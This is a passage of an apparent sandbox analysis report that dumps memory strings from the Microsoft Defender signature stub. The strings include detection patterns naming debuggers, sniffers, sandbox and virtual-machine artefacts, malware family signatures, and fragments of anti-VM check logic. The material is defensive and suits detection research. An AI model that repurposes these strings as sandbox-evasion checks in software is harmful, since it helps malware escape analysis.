P.EXE\|PROCEXP64.EXE\|PROCMON.EXE\|PSEXEC.EXE\|PSEXEC64.EXE\|PSFILE.EXE\|PSFILE64.EXE\|PSGETSID.EXE\|PSGETSID64.EXE\|PSINFO.EXE\|PSINFO64.EXE\|PSKILL.EXE\|PSKILL64.EXE\|PSLIST.EXE\|PSLIST64.EXE\|PSLOGGEDON.EXE\|PSLOGGEDON64.EXE\|PSLOGLIST.EXE\|PSLOGLIST64.EXE\|PSPASSWD.EXE\|PSPASSWD64.EXE\|PSPING.EXE\|PSPING64.EXE\|PSR.EXE\|PSSERVICE.EXE\|PSSERVICE64.EXE\|PSSHUTDOWN.EXE\|PSSUSPEND.EXE\|PSSUSPEND64.EXE\|PWSH.EXE\|RAMMAP.EXE\|RCSI.EXE\|REG.EXE\|REGASM.EXE\|REGDELNULL.EXE\|REGDELNULL64.EXE\|REGEDIT.EXE\|REGISTER-CIMPROVIDER\|REGJUMP.EXE\|REGSVCS.EXE\|REGSVR32.EXE\|REPLACE.EXE\|ROBOCOPY.EXE\|ROCCAT_SWARM.EXE\|RPCPING.EXE\|RUNDLL32.EXE\|RUNONCE.EXE\|RUNSCRIPTHELPER.EXE\|RUNTIMEBROKER.EXE\|SC.EXE\|SCRIPTRUNNER.EXE\|SDELETE.EXE\|SDELETE64.EXE\|SDIAGNHOST.EXE\|SEARCHFILTERHOST.EXE\|SEARCHINDEXER.EXE\|SEARCHPROTOCOLHOST.EXE\|SECURITYHEALTHSERVICE.EXE\|SERVICES.EXE\|SETTINGSYNCHOST.EXE\|SGRMBROKER.EXE\|SIGCHECK.EXE\|SIGCHECK64.EXE\|SIHOST.EXE\|SMARTSCREEN.EXE\|SMSS.EXE\|SPLWOW64.EXE\|SPOOLSV.EXE\|SPPSVC.EXE\|SQLDUMPER.EXE\|SQLPS.EXE\|SQLTOOLSPS.EXE\|STREAMS.EXE\|STREAMS64.EXE\|SURFACECOLORSERVICE.EXE\|SURFACESERVICE.EXE\|SVCHOST.EXE\|SYNCAPPVPUBLISHINGSERVER.EXE\|SYNCHOST.EXE\|SYSMON.EXE\|SYSMON64.EXE\|SYSTEMSETTINGSBROKER.EXE\|TASKHOSTW.EXE\|TASKMGR.EXE\|TCPVCON.EXE\|TCPVIEW.EXE\|TE.EXE\|TRACKER.EXE\|USBINST.EXE\|VBOXDRVINST.EXE\|VMCOMPUTE.EXE\|VMMAP.EXE\|VMMS.EXE\|VSJITD
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	Binary or memory string: *.LOG.\|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6350540468.00000197A32DC000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm

Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .AVHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: Systeminfo \| findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .)*.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp	Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .vhdpmem.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: vmware-tray.exe
Source: WerFault.exe, 00000009.00000002.3010846495.0000000006164000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWPn
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: MpSigStub.exe, 00000024.00000003.6292671700.00000197A4EEE000.00000004.00000001.sdmp	Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%s%s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000024.00000003.6293414365.00000197A317C000.00000004.00000001.sdmp	Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	Binary or memory string: Vmware
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp	Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: $ARRAY = [ "vmtoolsd.exe" , "vbox.exe" ]
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .AVHD.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .VHD.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .RCT.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: =8*\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp	Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000024.00000003.6292671700.00000197A4EEE000.00000004.00000001.sdmp	Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp	Binary or memory string: QEMU
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .VHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp	Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp	Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: %qemu
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .HRL.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp	Binary or memory string: 2-*.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .VMCX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .VMRS.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.txt.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
